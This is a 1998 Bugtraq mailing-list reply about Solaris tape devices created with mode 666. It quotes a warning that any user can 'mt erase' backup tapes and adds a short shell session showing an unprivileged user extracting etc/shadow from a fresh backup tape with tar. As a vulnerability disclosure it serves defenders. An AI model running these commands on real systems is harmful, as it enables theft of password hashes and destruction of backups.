Home page logo

bugtraq logo Bugtraq mailing list archives

Re: solaris tape dev permission stupidity
From: rob () RPI NET AU (Robert Thomas)
Date: Thu, 22 Oct 1998 12:17:54 +1000

joshua grubman wrote:
under solaris, scsi tape devices (/dev/rmt/*, which are linked to the st () x,x:
devs in /devices) are created with the permissions bits set to 666. this allows
a mallicious user with a login on your system to 'mt erase' the contents of any
tape devices connected to your system.

It's not that simple.  Say, for example, you the unix administrator, as a good
boy/girl, does a daily backup... That backup is written to the tape. All is
well and good. You leave your desk, and start to wander over to the computer
room, to pull the tape out of the drive.  IN that time, someone's done:

lamer () leeto$ cd
lamer () leeto$ mt -f /dev/nrmt/0h rewind
lamer () leeto$ tar xvf /dev/nrmt/0h etc/shadow
lamer () leeto$ cd etc
lamer () leeto$ more shadow
..shadow password entry..

and your shadow password file is open to the world.

Just one, of many, bad-things(tm) that can be done with lame-arsed tape

--Rob Thomas

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]